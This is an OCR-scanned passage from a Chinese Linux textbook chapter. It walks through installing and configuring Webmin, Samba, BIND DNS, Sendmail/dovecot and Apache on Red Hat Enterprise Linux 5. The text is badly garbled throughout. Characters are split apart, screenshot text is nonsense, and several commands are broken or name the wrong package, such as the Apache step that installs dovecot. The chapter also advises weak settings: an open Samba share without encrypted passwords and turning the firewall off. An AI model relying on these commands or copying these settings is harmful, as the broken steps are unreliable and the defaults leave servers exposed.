(24) 单 击 “ 前 进 ” 按 钮 ,进入 “创建 用 户 ” 界 面 ,在 这 里 用 户 可 以 创建 其 他 用 户 , 也 可 以 在 


安装 完成 后 再 根据 实 eight 


(25) 单 击 “ 前 进 ” 按 钮 ,进入 “声卡 测试 "界面 , 单 击 界面 上 向 右 的 三 角形 ,如 果 能 听 到 悦 


耳 的 音乐 ,说 明 安装 成 功 。 
(26) 单 击 “ 前 进 ” 按 钮 ,进入 “附加 光盘 ”界面 ,可 以 增加 额外 的 软件 。 


(27) 单 击 “ 结 束 ” 按 钮 ,进入 “登录 ”界面 ,如 图 9-6 所 示 , 安 装 至 此 已 经 完成 , 接 下 来 输 


入 用 户 名 和 密码 ,就 可 以 使 用 Red HatEnterprise Linux 5。 
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9-6 登录 界面 


至 此 ,Linux 的 安装 工作 全 部 完成 ,但 是 如 果 要 配置 各 种 服务 ,还 需要 检查 相应 服务 的 
软件 包 是 否 已 经 安装 ,如 果 没 有 安装 还 需要 手动 进行 安装 ,在 9. 2 节 中 ,将 介绍 Linux 部 分 


服务 的 配置 以 及 相应 服务 的 安装 方法 。 
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9.2 Linux 服务 的 安装 与 配置 


9.2.1 Webmin 的 安装 与 配置 


1. Webmin 的 介绍 

Webmin 是 Linux 和 UNIX 下 基于 Web 的 系统 管理 和 网 络 管理 的 强大 的 图 形 化 管理 
工具 ,使 用 浏览 器 通过 Webmin 用 户 界面 即 可 轻松 管理 本 地 或 远程 服务 器 。 目 前 该 软件 支 
持 大 多 数 的 Linux、UNIX 系统 。 相 对 于 其 他 的 GUI 工具 ,Webmin 具有 以 下 特点 。 

(1) Webmin 具有 本 地 和 远程 管理 能 力 , 同 时 访问 控制 和 SSL 支持 为 远程 管理 提供 了 
很 高 的 安全 性 。 

(2) 插件 式 结构 使 得 Webmin 具有 很 强 的 扩展 性 和 伸缩 性 , 它 的 管理 模块 几乎 涵盖 了 
常见 的 Linux 管理 。 

(3) 提供 多 语言 版 本 ,对 中 文 也 有 相当 好 的 支持 。 

2. Webmin 的 安装 

为 了 使 Webmin 能 够 运行 良好 ,需要 安装 Perl 语言 解释 器 .Net_SSLeay Perl 和 
OpenSSL。 

1) 安装 Perl 语言 解释 器 

Webmin 的 管理 程序 使 用 标准 的 Perl 语言 实现 ,所 以 要 安装 Perl 语言 解释 器 ,使 用 管理 员 
权限 登录 系统 ,打开 终端 ,输入 命令 rpm -q perl, 如 果 出 现 perl-5. 8. 8-10 说 明 安 装 成 功 , 版 本 是 
5. 8. 8-10。 如 果 出 现 package perl is not install 说 明 未 安装 成 功 ,将 Red Hat Enterprise Linux 5 
的 第 一 张 光盘 放 入 光驱 ,找到 Perl 语言 解释 器 的 RPM 安装 包 perl-5. 8. 8-10. i386. rpm, 使 用 命 
令 rpm -ivh /mnt/Server/ perl-5. 8. 8-10. i386. rpm 进行 安装 。 

2) 安装 Net_SSLeay perl 和 OpenSSL 

为 了 保证 浏览 器 和 Webmin 之 间 数 据 传输 的 安全 ,需要 安装 Net_SSLeay Perl 模块 和 
OpenSSL 软件 ,使 Webmin 支持 SSL 加 密 传输 功能 ,为 用 户 提供 安全 的 管理 环境 。 

首先 访问 网 址 http://www. openssl. org/source/, 下载 OpenSSL 软件 源 代 码 包 
openssl-1. 0. 0-bate3. tar. gz。 

然后 使 用 下 列 命令 安装 OpenSSL。 

tar zxvf openssl ~ 1.0.0— bate3. tar.gz 

cd openssl ~ 1.0.0— bate3 

/configure 

make 

make install 

接 下 来 访问 网 址 http://search. cpan. org/dist/ Net_SSLeay. pm/ ,下载 Webmin Net_ 
SSLeay. pm 模块 ,文件 名 为 Net_SSLeay. pm-1. 30. tar. gz。 

然后 使 用 下 列 命令 安装 Net_SSLeay perl 模块 。 


tar zxvf Net_SSLeay. pm 一 1.30.tar.gz 


第 9 章 Linux 操作 系统 的 安全 性 Zs 


cd Net_SSLeay. pm 一 1.30 

perl Makefile.PL 

make install 

3) 安装 Webmin 

首先 访问 网 址 http://prdownloads. sourceforge. net/webadmin 下 载 文件 webmin-1. 480 
1. noarch. rpm, 下 载 完 成 后 使 用 命令 rpm -ivh webmin-1. 480-1. noarch. rpm 进行 安装 。 

Webmin 内 置 了 一 个 Web 服务 器 , 当 Webmin 安装 完成 后 , Webmin 会 默认 在 本 机 所 有 
可 用 的 IP 地址 上 的 TCP 10000 端口 监听 客户 端的 请 求 ,打开 浏览 器 访问 “https://Linux 
服务 器 的 IP 或 域名 :10000/” 会 出 现 登 录 界 面 , 输 入 Linux 服务 器 管理 员 账 号 和 密码 进行 登 
录 。 如 果 Linux 服务 器 开启 了 防火 墙 , 就 需要 设置 开放 TCP10000 端口 或 关闭 防火 墙 。 

4) 停止 .启动 和 重新 启动 Webmin 服务 

(1) 启动 Webmin 服务 : 命令 为 service webmin start 或 者 /etc/rc. d/init. d/webmin 
Start 。 

(2) 停止 Webmin 服务 : 命令 为 service webmin stop 或 者 /etc/rc. d/init. d/ webmin stop。 

(3) 重新 启动 Webmin 服务 : 命令 为 service webmin restart 或 者 /etcyrc. d/init. d/ webmin 
restart。 

(4) 自动 启动 Webmin 服务 : 如 果 需 要 让 Webmin 服务 自动 启动 ,可 以 执行 “ntsysv” 命 
令 服 务 配置 对 话 框 ,找到 webmin 服务 ,在 其 前 面 加 上 (x* ), 然 后 单 击 “ 确 定 ” 按 钮 ( 注 : 加 
“x ”时 用 空格 键 ,在 “确定 ”与 “取消 ”按钮 之 间 用 Tab 键 ), 如 图 9-7 所 示 , 选 择 完成 后 , 按 
Enter 键 。 


roctGiocaihosE 二 
文件 人 ) ”编辑 全 ) 查看 (V) 终端 (D 标签 @) 帮助 四 


图 9-7 设置 自动 运行 Webmin 服务 


3. Webmin 的 设置 

Webmin 支持 多 种 语言 ,默认 为 英文 ,设置 为 中 文 的 步骤 如 下 。 

(1) 单 击 管理 界面 上 方 的 Webmin 图 标 , 在 出 现 的 页 面 中 单 击 Change Language and 
Theme 超 链接 。 
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(2) 修改 Webmin UI language 选项 为 Personal choice, 然 后 在 下 拉 列 表 中 选择 Simplified 
Chinese, 为 了 使 用 原 有 的 Linux 界面 风格 可 修改 Webmin UI Theme 选项 为 Personal 
choice, 然 后 在 下 拉 列 表 中 选择 MSC. Linux Theme, 最 后 单 击 Make Changes 按钮 确定 即 
可 ,如 图 9-8 所 示 。 

Webmin 的 配置 已 经 完成 ,大 家 可 以 自己 学 习 通过 Webmin 配置 各 种 服务 的 方法 。 


Webmin 1.480 on Iocalhost.localdomain (Redhat Enterprise Linux 5) - Mozilla Firefox -ox 

文件 介 编 总 全 ) 查看 人 W) 转 到 (G) 书签 @) 工 匡 人 D 末 助 录 二 
入- 齐 - 候 固 合 [和 ntps/zlg24652001oo00/ 司 ] @ 针 [只 
网 kedHat 网 RedHatMagazine 网 RedHatNetwork 网 RedHatsupport 
Login: root 
abn Change Language and Theme 

Backup Configuration Files 

This module can be used to change the language that modules are displayed in and the theme 
Change Language and Theme 


that controls Webmin's appearance for your Webmin account only. 
Webmin Actions Log 


Webmin Configuration 


Webmin Ul language ( Global language (English (US) 
Webmin Servers Index 人 Personal choice .| Simpiified Chinese (ZH_CN.UTF-8) 可 


Webmin Users 5| webmin ultheme Global theme (Blue Framed Theme) 


@ system 人 Personal choice .. [MSC Linux Theme 7] 


回 Servers 
Oihare Make Changes 
Networking 

回 Hardware 

回 Cluster 

@ Un-used Modules 


Search 
A View Modules Logs 
[Bnd 


完成 29246520010000 加 


| 加 [root@localhost/software] Webmin 1.480 on localhost localdomain (一 


图 9-8 设置 Webmin 界面 语言 


9.2.2 Samba 服务 的 安装 与 配置 


1. Samba 介绍 


SMB 协议 可 以 看 做 是 局 域 网 上 的 共享 文件 夹 /打印 机 的 一 种 协议 ,该 协议 可 以 用 在 
TCP/IP 之 上 ,也 可 以 用 在 其 他 网 络 协议 (如 IPX 和 NetBEUI) 之 上 。 通 过 SMB 协议 ,客户 
端 可 以 在 各 种 网 络 环境 下 读 、 写 服务 器 上 的 文件 等 共享 资源 。 目 前 Samba 的 最 新 版 本 是 
3.0.25b, 它 有 下 列 主要 功能 。 

(1) 提供 Windows 风格 的 文件 和 打印 共享 ,Windows 95 以 上 的 操作 系统 都 可 以 利用 
Samba 操作 系统 共享 Linux 上 的 资源 ,从 外 表 上 来 看 和 共享 Windows 的 资源 没有 区 别 。 

(2) 在 Windows 网 络 中 解析 NetBIOS 的 名 字 , 在 跨越 网 关 的 时 候 还 可 以 作为 WINS 
服务 器 使 用 。 

(3) 提供 SMB 客户 功能 。 利 用 Samba 程序 提供 的 smbclient 程序 可 以 在 Linux 中 类 
似 于 FTP 访问 Windows 共享 资源 。 

(4) 提供 一 个 命令 行 工 具 , 利 用 该 工具 可 以 有 限制 地 支持 Windows 某 些 管理 功能 。 
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2. Samba 服务 的 安装 

在 了 解 了 SMB 协议 的 基本 知识 后 ,下 面 介绍 一 下 Samba 的 配置 过 程 。 

(1) 使 用 管理 员 权 限 登 录 系 统 ,打开 终端 ,输入 命令 rpm -q samba, 如 果 出 现 samba- 
3.0.25b-0. el5.4 说明 安 装 成 功 ; 如 果 出 现 package samba is not install 说 明 未 安装 成 功 ， 
将 Red Hat Enterprise Linux 5 的 第 一 张 光盘 放 入 光驱 ,找到 samba 服务 的 RPM 安装 包 文 
件 samba-3. 0. 25b-0. e15. 4. i386. rpm 使 用 rpm -ivh samba-3. 0. 25b-0. e15. 4. i386. rpm。 
使 用 相同 的 方法 将 system-config-samba-1. 2. 39-1. el5. noarch. rpm、samba-client-3. 0. 25b- 
0. el15. 4.1386. rpm 和 samba-common-3. 0. 25b-0. el5. 4.1386. rpm 也 安装 上 ,因为 这 些 是 
Samba 的 相关 软件 包 。 

(2) 停止 .启动 和 重新 启动 Samba 服务 

。 启动 Samba 服务 : 命令 为 service smb start 或 者 /etc/rc. d/init. d/ smb start 。 

。 停止 Samba 服务 : 命令 为 service smb stop 或 者 /etc/rc. d/init. d/ smb stop。 

。 重新 启动 Samba 服务 : 命令 为 service smb restart 或 者 /etc/re. d/init. d/ smb restart。 

。 自动 启动 Samba 服务 : 如 果 需 要 让 Samba 服务 自动 启动 ,可 以 执行 “ntsysv” 命 令 服 
务 配 置 对 话 框 ,找到 smb, 在 其 前 面 加 上 (x* ), 然 后 单 击 “ 确 定 ” 按 钮 ( 注 : 加 “x* ”时 
用 空格 键 ,在 “确定 ”与 取消 "按钮 之 间 选择 用 Tab 键 ) ,如 图 9-7 所 示 。 

3. Samba 服务 的 配置 

安装 好 Samba 软件 包 并 重启 无 误 后 ,说 明 安装 成 功 , 下 面 来 介绍 一 下 Samba 的 配置 过 程 。 

(1) 首先 打开 Samba 配置 窗口 ,具体 步骤 为 :“ 系 统 ” 一 “管理 "一 "服务 器 设置 ?一 
Samba ,打开 Samba 配置 界面 。 单 击 * 添 加 共享 ,选择 “基本 ”选项 卡 , 如 图 9-9 所 示 ,在 此 界 
面 上 有 4 项 需要 设置 。 

。 目录 : 在 此 输入 共享 路 径 , 即 共享 文件 的 路 径 。 

。 共享 名 : 选择 默认 即 可 。 

。 描述 : 输入 有 代表 性 的 关键 词 , 以 示 区 别 , 也 可 以 选择 默认 。 

。 共享 文件 属性 : 选中 “可 擦 写 " 和 “显示 ” 复 选 框 。 

(2) 选择 “访问 "选项 卡 , 选 中 “允许 所 有 用 户 访问 ”, 最 后 单 击 “ 确 定 ” 按 钮 。 

(3) 单 击 “ 首 选项 ” ,选择 “服务 器 设置 ,选择 "基本 ?选项 卡 , 如 图 9-10 所 示 。 在 此 界面 
上 有 两 项 需要 设置 。 

。 工作 组 : 设置 为 本 机 所 在 局 域 网 的 用 户 组 。 

。 描述 : 选择 默认 即 可 。 


创建 Samba 共享 


目录 DD): [shareme 工作 组 WW) : 
共和 : 8 : 
mw: [ | 
回 可 操 写 WW 

Peo 


图 9-9 Samba 基本 设置 界面 图 9-10 服务 器 基本 设置 
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(4) 选择 “安全 性 ”选项 卡 。 在 此 界面 上 有 以 下 三 项 需要 进行 设置 。 
。 验证 模式 : 该 下 拉 菜 单 可 选项 为 “共享 “用 户 ”ADS、“ 服 务 器 ”和 “ 域 ”, 这 里 选择 
“共享 ”。 

。 加 密 口令 : 选择 “ 否 ”。 

。 来 宾 账 号 : 选择 “无 来 宾 账 号 ”。 

设置 完成 后 , 单 击 “ 确 定 ” 按 钮 。 至 此 一 个 简单 的 Samba 服务 已 经 配置 完成 。 

4. Samba 服务 的 验证 

具体 操作 步骤 是 : 选择 “开始 ”>“ 运 行 ”, 在 “运行 "对 话 框 中 输入 \\IP 地 址 或 者 \\ 主 机 
名 ,如 图 9-11 所 示 ,在 客户 端的 workgroup 工作 组 中 可 以 看 到 Samba 服务 的 共享 目录 。 


Sanba Server 2 (192.168.1.107) 
文件 下 编辑 E) 查看 WD 收藏 和 ) 工具 中 帮助 如 


所 -上 目 - 访 有 内控 辽阔 | 国 - 


地 址 四 ) | 显 \\192. 168.1. 107 


办 公 室 
抽查 在 工作 坦 计 算 机 
宇和 
9-11 访问 Linux 共享 界面 
在 一 个 简单 的 局 域 网 内 ,这 样 的 配置 已 经 够 用 了 (已 经 能 够 完全 实现 文件 共享 ), 但 是 如 
果 对 于 安全 性 要 求 较 高 的 局 域 网 就 要 求 设置 成 “user”、“Server” 或 者 更 高 的 安全 等 级 。 


9.2.3 DNS 服务 的 安装 与 配置 


1. DNS 介绍 


DNS 名 称 采用 层次 化 、 结 构 化 的 命名 机 制 , 这 种 机 制 比 NetBIOS 名 称 体系 更 加 科学 ， 
可 扩展 性 强 , 适 用 于 各 种 规模 的 网 络 。 因 此 ,Internet 将 DNS 名 称 体系 作为 其 标准 的 命名 
体系 。 

DNS 通常 采用 FQDN 的 形式 来 表示 ,由 主机 名 和 域名 两 部 分 组 成 。 例 如 www. hello. cn 
就 是 一 个 典型 的 FQDN ,其 中 ,www 是 主机 名 ,表示 域 中 的 一 台 主 机 ; hello. cn 是 域名 , 表 
示 一 个 域 或 一 个 范围 。FQDN 名 最 长 可 达 255 个 字符 ,可 以 包含 字母 ,数字 、 连 字符 和 句 
点 。 通 过 FQDN 可 以 在 DNS 名 称 空间 中 指出 主机 的 准确 位 置 。 

2. DNS 服务 的 安装 

Linux 下 DNS 服务 的 服务 名 称 为 named, 对 应 的 软件 包 为 bind, 安 装 步骤 如 下 。 

(1) 首先 打开 终端 ,输入 命令 rpm -q bind, 如 果 出 现 bind-9. 3. 3-10. el15 说 明 安 装 成 功 ， 
如 果 出 现 package bind is not install 说 明 未 安装 成 功 ,将 Red Hat Enterprise Linux 5 的 第 
一 张 光盘 放 入 光驱 后 以 bind 为 关键 词 进 行 检 索 ,一 共有 11 个 相关 软件 包 , 找 到 DNS 服务 
的 RPM 安装 包 bind-9. 3. 3-10. el5. i386. rpm 使 用 rpm -ivh bind-9. 3. 3-10. el15. i386. rpm 
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进行 安装 。 使 用 相同 命令 将 下 列 相关 软件 包 进 行 安装 。 


bind-chroot 一 9.3.3 一 10.e15. i386. rpm 

bind— devel -9.3.3— 10.el5.1i386.rpm 

bind— libs— 9.3.3— 10.el5. i386.rpm 

bind— sdb— 9.3.3. -10.el5. i386.rpm 

ypbind — 1.19— 8.el5. i386. rpm 

system— config— bind— 4.0.3—2.el5.noarch. rpm 
bind— utils— 9.3.3—10.el5.1i386.rpm 
kdebindings — 3.5.4— 1.fc6. i386. rpm 


(2) 启动 停止 和 重新 启动 named 服务 。 


。 启动 DNS 服务 : 命令 为 service named start 或 者 /etcyrc. d/init. d/ named start。 
。 停止 DNS 服务 : 命令 为 service named stop 或 者 /etcyrc. dy/init. d/ named stop。 
。 重新 启动 DNS 服务 : 命令 为 service named restart 或 者 /etc/rc. d/init. d/ named 


restart。 


。 自动 启动 DNS 服务 : 如 果 需 要 让 DNS 服务 自动 启动 ,可 以 执行 “ntsysv” 命 令 服务 
配置 对 话 框 ,找到 named 服务 ,在 其 前 面 加 上 (x* ) ,然后 单 击 “ 确 定 ” 按 钮 ,如 图 9-7 


所 示 。 
3. DNS 服务 的 配置 


bind 软件 包 安 装 完成 后 ,重新 启动 named 服务 ,如 果 成 功 说 明 安 装 成 功 , 接 下 来 就 可 以 


配置 DNS 服务 ,具体 步骤 如 下 。 


(1) 首先 打开 BIND 配置 窗口 ,具体 操作 步骤 为 : 选择 “系统 ”>“ 管 理 ”>“ 服 务 器 设置 ”一 


“域名 服务 系统 ”, 如 图 9-12 所 示 。 


BIND 配置 GUI 
文件 从 ”帮助 t) 
FBEGO 
”新 建 属性 出 除 导入 欲 贷 保存 
| 
国 DNS 服务 器 
om mdckey DNS 安全 密 胃 
bk locahost 互联 网 正 向 网 络 区 域 
b 9 wo0 互联 网 到 向 IPv4 网 络 区 域 
b 30 互联 网 志向 IPv4 网 络 区 域 
i 互联 网 正 向 网 结 区 域 
b 9255 互联 网 到 向 IPv4 网 结 区 域 
bE localdomain 互联 网 正 向 同比 区 域 
dg :24 互 了 网 志向 IPv6 ARPA 同比 区 二 
二 主 一 个 需 1 报 并 松 开 村 村 9 右键 


图 9-12 BIND 配置 界面 


(2) 选中 DNS 服务 器 , 单 击 “ 新 建 ”>“ 网 络 区 域 ”, 依 次 单 击 两 个 “确定 ”按钮 ,在 出 现 的 
IN 对 话 框 中 输入 “hello. cn. ”, 单 击 “ 确 定 ” 按 钮 ,在 弹出 的 界面 中 使 用 默认 即 可 ,继续 单 击 


“确定 ”按钮 。 这 时 会 在 图 9-12 的 界面 上 多 出 一 个 “hello. cn”。 


(3) 右键 选中 hello. cn 添加 IPv4 地 址 219. 246. 5. 126 ,并 选中 “创建 逆向 映射 记录 ”。 
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(4) 在 此 新 建 “网 络 区 域 " 完 成 , 单 击 “ 保 存 ” 按 钮 ,在 弹出 的 对 话 框 上 选择 “是 ”, 并 重新 
启动 named 服务 。 首 先 使 用 命令 nslookup 检查 能 否 实现 正 反 解析 ,如 果 解 析 成 功 ,配置 
DNS 成 功 ,可 以 进行 后 续 配 置 工作 ,DNS 服务 器 配置 结束 。 

(5) 选中 hello. cn 然后 单 击 右键 ,添加 “MX 邮件 交换 ”, 在 邮件 服务 器 名 对 话 框 里 输入 
“mail”。 

(6) 右 击 hello. cn, 添 加 IPv4 地 址 ,在 域名 中 输入 “dns”, 修 改 IPv4 地 址 为 本 地 
IP 219. 246. 5. 126 。 


(7) 按照 步骤 (5) 依 此 添加 mail、www、smtp 和 pop3( 为 Web 和 MAIL 配置 做 准备 ) 。 
并 修改 IP 地 址 。 结 果 如 图 9-13 所 示 。 
党 BIND 配置 SUT = 外 外 
文件 亿 二 助人 包 
i 车 因 过 芝 日 
新 建 属性 才 除 导入 葡 览 保存 
二 执 :[ 旧 
La 可 25265 互 取 卫 十 可 TPVT 彩 吕 区 基 - 
b Ho 互联 网 这 向 IPv4 同 结 区 域 
= EE helocn 互联 同 正 向 同属 区 城 
》 拥 。。 网络 区 域 权 同 信息 SOA 
》 轿 helocn -> 2192465126 A 
DP 名 邮件 交 鬼 Mx 
》 逢 ” 志 称 服务 器 localhost NS 
b 思 dns -> 2192465126 A 
>》 上 mai .> 2192465126 A 
bP 蔚 www -> 2192465.126 A 
》 国 smtp -> 2192465126 A 
》 国 pop3 -> 2192465126 A 
b 日 25 互联 网 过 向 IPv4 网 党 区 域 
b EE localdomain 互联 网 正 向 网络 E 央 
b wi /14 互联 网 二 向 IPv6 ARPA 有 同城 


EREEEEELITET 


图 9-13 配置 结束 界面 
(8) 重新 启动 named 服务 ,使 用 命令 nslookup 进行 正 反 解析 。 
9.2.4 MAIL 服务 的 安装 与 配置 


1. MAIL 协议 介绍 

实现 电子 邮件 服务 的 主要 协议 有 SMTP、POP3 和 IMAP4 ,下面 分 别 介绍 这 三 种 协议 。 

1) SMTP 

SMTP 是 一 种 提供 可 靠 且 有 效 电子 邮件 传输 的 协议 ,提供 传送 邮件 的 机 制 ,如 果 接 收 
方 与 发 送 方 连接 在 同一 个 服务 器 上 ,邮件 可 以 直接 由 发 送 方 主机 传送 到 接收 方 主机 ; 当 接 
收 方 与 发 送 方 不 在 同一 个 传送 服务 下 时 ,通过 中 继 SMTP 服务 器 传送 。 为 了 能 够 对 SMTP 
服务 器 提供 中 继 能 力 , 它 必须 拥有 接收 方 的 主机 地 址 和 邮箱 名 称 。 

2) POP3 

POP3 即 邮局 协议 的 第 三 个 版 本 , 它 是 将 个 人 计算 机 连接 到 Internet 的 邮件 服务 器 和 
下 载 电 子 邮 件 的 电子 协议 。 它 是 因特网 电子 邮件 的 第 一 个 离线 协议 标准 ,POP3 允许 用 户 
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从 服务 器 上 把 邮件 存储 到 本 地 主机 上 ,同时 删除 保存 在 邮件 服务 器 上 的 邮件 ,而 POP3 服务 
器 则 是 遵循 POP3 的 接收 邮件 服务 器 ,用 来 接收 电子 邮件 的 。 是 TCP/IP 协议 簇 中 的 一 员 ， 
POP3 服务 所 用 的 端口 为 110。 本 协议 主要 用 于 支持 使 用 客户 端 远 程 管理 在 服务 器 上 的 电 
子 邮 件 。 

3) IMAP4 

IMAP4 能 以 三 种 模式 或 者 消息 传送 范式 来 与 客户 进行 交互 : 离线 .在线 和 断 连 方式 ， 
下 面 分 别 简单 介绍 这 三 种 模式 的 区 别 。 

(1) 离线 方式 : 客户 软件 把 邮箱 存储 在 本 地 硬盘 上 以 进行 读 取 和 撰写 信息 的 工作 。 当 
需要 发 送 和 接收 消息 时 ,用 户 才 连接 服务 器 。 对 于 那些 长 期 奔波 、 很 少 停留 在 某 个 固定 处 所 
的 人 ,他 们 通常 使 用 离线 方式 ,POP3 一 般 以 离线 方式 工作 。 

(2) 在 线 方式 : 主要 是 由 位 置 固定 的 用 户 使 用 ,典型 地 是 在 快速 LAN 连接 下 进行 。 对 
于 从 远程 拨 进 的 功能 较 弱 的 计算 机 在 这 种 模式 下 也 可 以 工作 得 很 好 。 有 一 些 POP3 服务 器 
也 提供 了 在 线 功 能 ,但 是 ,它们 没有 达到 IMAP4 的 功能 级 别 。 

(3) 断 连 方式 : 该 方式 提供 了 最 大 的 灵活 性 。 客 户 软 件 把 用 户 选 定 的 消息 和 附件 复制 
或 缓存 到 本 地 磁盘 上 ,并 把 原始 副本 留存 在 邮件 服务 器 上 。 缓 存 中 的 邮件 可 以 被 用 户 处 理 ， 
以 后 用 户 重 新 连接 邮件 服务 器 时 ,这 些 邮 件 可 以 与 服务 器 进行 再 同步 。 

2. MAIL 服务 的 安装 


Sendmail 是 一 个 比较 优秀 的 邮件 服务 器 软件 ,几乎 所 有 的 Linux 的 默认 配置 都 内 置 了 
这 个 软件 ,而 且 是 默认 安装 好 的 。 设 置 好 操作 系统 后 , 它 就 能 立即 运行 起 来 ,在 大 多 数 系统 
中 都 是 以 root 身份 运行 的 。Sendmail 的 系统 结构 不 适合 较 大 的 负载 ,对 于 高 负载 的 邮件 系 
统 ,需要 对 Sendmail 进行 复杂 的 调整 。 

1) 安装 dovecot 服务 

Linux 下 SMTP 和 POP3 服务 包含 在 dovecot 服务 里 ,用 管理 员 权 限 登 录 系 统 ,打开 终 
端 ,输入 命令 rpm -q dovecot, 如 果 出 现 dovecot-1. 0-1. 2. rcl15. el5 说 明 安装 成 功 ,如 果 出 现 
package dovecot is not install 说 明 未 安装 成 功 , 将 Red Hat Enterprise Linux 5 的 第 一 张 光 盘 放 
人 光驱 ,以 “dovecot "为 关键 词 进行 检索 , 找到 安装 包 dovecot-1. 0-1. 2. rcl5. el15. i386. rpm, 使 
用 rpm -ivh dovecot-1. 0-1. 2. rcl15. el5. i386. rpm, 使 用 同样 的 命令 安装 perl-DBI-1. 52- 
1. fc6.i386. rpm 和 mysql-5. 0. 22-2. 1. 1386. rpm。 

2) 启动 ,停止 和 重新 启动 Sendmail 服务 

(1) 启动 Sendmail 服务 : 命令 为 service sendmail start 或 者 /etc/re. d/init. d/ 
sendmail start。 

(2) 停止 Sendmail 服务 : 命令 为 service sendmail stop 或 者 /etcyrc. d/init. d/ sendmail 
stop。 

(3) 重新 启动 Sendmail 服务 : 命令 为 service sendmail restart 或 者 /etc/re. d/init. d/ 
sendmail restart。 

(4) 自动 启动 Sendmail 服务 : 如 果 需 要 让 Sendmail 服务 自动 启动 ,可 以 执行 “ntsysv” 
命令 服务 配置 对 话 框 ,找到 sendmail 服务 ,在 其 前 面 加 上 (x* ), 然 后 单 击 “ 确 定 ” 按 钮 ,如 
图 9-7 所 示 。 
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3) 启动 .停止 和 重新 启动 dovecot 服务 

(1) 启动 dovecot 服务 : 命令 为 service dovecot start 或 者 /etc/yrc. d/init. d/ dovecot start。 

(2) 停止 dovecot 服务 : 命令 为 service dovecot stop 或 者 /etcyrc. d/init. d/ dovecot stop。 

(3) 重新 启动 dovecot 服务 : 命令 为 service dovecot restart 或 者 /etc/rce. d/init. d/ 
dovecot restart。 

(4) 自动 启动 dovecot 服务 : 如 果 需 要 让 dovecot 服务 自动 启动 ,可 以 执行 “ntsysv” 命 令 服 
务 配置 对 话 框 ,找到 dovecot 服务 ,在 其 前 面 加 上 (* ) ,然后 单 击 “ 确 定 ” 按 钮 ,如 图 9-7 所 示 。 

3. MAIL 服务 的 配置 

安装 完 上 面 的 服务 后 ,重新 启动 sendmail 和 named 服务 ,如果 重新 启动 成 功 , 则 可 以 进 
行 MAIL 服务 配置 ,详细 配置 步骤 如 下 。 

(1) 打开 终端 ,输入 命令 : #vi /etc/mail/sendmail. mc, 打 开 配 置 文件 。 

首先 输入 冒号 ,然后 输入 命令 “set nu” 显 示 行 标 ,这 样 可 以 方便 查找 修改 位 置 ( 注 : 在 
Linux 下 用 vi 编辑 器 修改 配置 文件 时 , 按 I 键 修改 , 按 Esc 键 退出 编辑 状态 “qdq! 7 为 不 保存 
强行 退出 ,“wq” 为 保存 并 退出 ) ,然后 修改 下 面 两 行 。 

116 行 修改 为 : 

DAEMON_OPTIONS( 'Port = smtp, Addr = 0.0.0. 0，Name = MTA')dnl 

151 行 修改 为 : 


LOCAL DOMAIN( 'mail. hello. cn')dnl 


mail. hello. cn 在 DNS 配置 中 已 经 配置 为 邮件 服务 器 域名 ,用 户 也 可 以 自己 进行 设置 。 
(2) 输入 命令 : 


# m4 /etc/mail/sendmail. mc > /etc/mail/sendmail.cf 


(3) 输入 命令 : 

# vi /etc/mail/access 
添加 记录 

mail. hello. cn RELAY 
hello.cn RELAY 
219.246.5.126 RELAY 
并 保存 。 

(4) 输入 命令 : 


# cd /etc/mail 
# makemap hash access <access 


(5) 重新 启动 dovecot 服务 和 sendmail 服务 。 
4. MAIL 服务 的 验证 


(1) 首先 在 服务 器 上 添加 用 户 , 具 体 添 加 步骤 为 : 选择 “系统 ”一 “管理” 一 “用 户 和 组 
群 ”, 在 打开 的 界面 上 选择 “添加 用 户 ” 创 建 两 个 用 户 , 如 zhangsan 和 lisi。 
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(2) 在 客户 端 使 用 这 两 个 用 户 名 相互 收发 邮件 。 客 户 端 Outlook 设置 邮件 用 户 在 这 里 
不 再 做 介绍 ,但 是 必须 将 客户 端的 DNS 服务 器 地 址 设置 为 219. 246. 5. 126, 即 邮件 服务 器 
的 IP 地址 。 


9.2.5 Web 服务 的 安装 与 配置 


1. Apache 介绍 

Apache 是 应 用 非常 广泛 的 Web 服务 器 软件 。 它 可 以 运行 在 几乎 所 有 的 计算 机 平台 
上 。 由 于 它 是 免费 软件 ,所 以 不 断 有 人 来 为 它 开发 新 的 功能 、 新 的 特性 、 修 改 原来 的 缺陷 。 
Apache 的 特点 是 简单 .速度 快 ,性 能 稳定 ,并 可 作为 代理 服务 器 来 使 用 。Apache 有 多 种 产 
品 , 可 以 支持 SSL 技术 ,支持 多 个 虚拟 主机 。Apache 是 以 进程 为 基础 的 结构 ,进程 要 比 线 
程 消耗 更 多 的 系统 开支 ,不 太 适 合 于 多 处 理 器 环境 。Apache Web 服务 器 软件 主要 有 以 下 
特性 。 

(1) 支持 HTTP/1. 1 通信 协议 。 

(2) 拥有 简单 而 强 有 力 的 基于 文件 的 配置 过 程 。 

(3) 支持 基于 IP 和 基于 域名 的 虚拟 主机 。 

(4) 支持 多 种 方式 的 HTTP 认证 。 

2. Web 服务 的 安装 

1) 安装 Web 服务 

首先 使 用 管理 员 权 限 登 录 系 统 , 打 开 终 端 , 输 入 命令 rpm -q httpd, 如 果 出 现 httpd- 
2.2. 3-11. el15 说 明 安装 成 功 ,如 果 出 现 package httpd is not install 说 明 未 安装 成 功 ,将 Red 
Hat Enterprise Linux 5 的 第 一 张 光盘 放 入 光驱 后 以 “httpd” 为 关键 词 进行 检索 ,找到 安装 
包 httpd-2. 2. 3-11. el15.i386. rpm, 使 用 rpm -ivh dovecot-1. 0-1. 2. rcl5. el15.1386. rpm, 使 用 
同样 的 命令 将 下 列 安装 包 httpd-devel-2. 2. 3-11. el5. i386. rpm、httpd-manual-2. 2. 3- 
11. el5. i1386. rpm 和 system-config-httpd-1. 3. 3. 1-1. el5. noarch. rpm 安装 。 

如 果 Apache 服务 安装 成 功 ,在 浏览 器 里 输入 本 机 IP 地 址 ,将 显示 Apache 主页 。 

2) 启动 .停止 和 重新 启动 Web 服务 

(1) 启动 httpd 服务 : 命令 为 service httpd start 或 者 /etc/re. d/init. d/ httpd start。 

(2) 停止 httpd 服务 : 命令 为 service httpd stop 或 者 /etcyrc. d/init. d/ httpd stop。 

(3) 重新 启动 httpd 服务 : 命令 为 service httpd restart 或 者 /etcyrc. d/init. d/ httpd 
restart。 

(4) 自动 启动 httpd 服务 : 如 果 需 要 让 httpd 服务 自动 启动 ,可 以 执行 “ntsysv” 命 令 服 
务 配置 对 话 框 ,找到 httpd 服务 ,在 其 前 面 加 上 (* ) ,然后 单 击 “ 确 定 ” 按 钮 ,如 图 9-7 所 示 。 

3. Web 服务 的 配置 

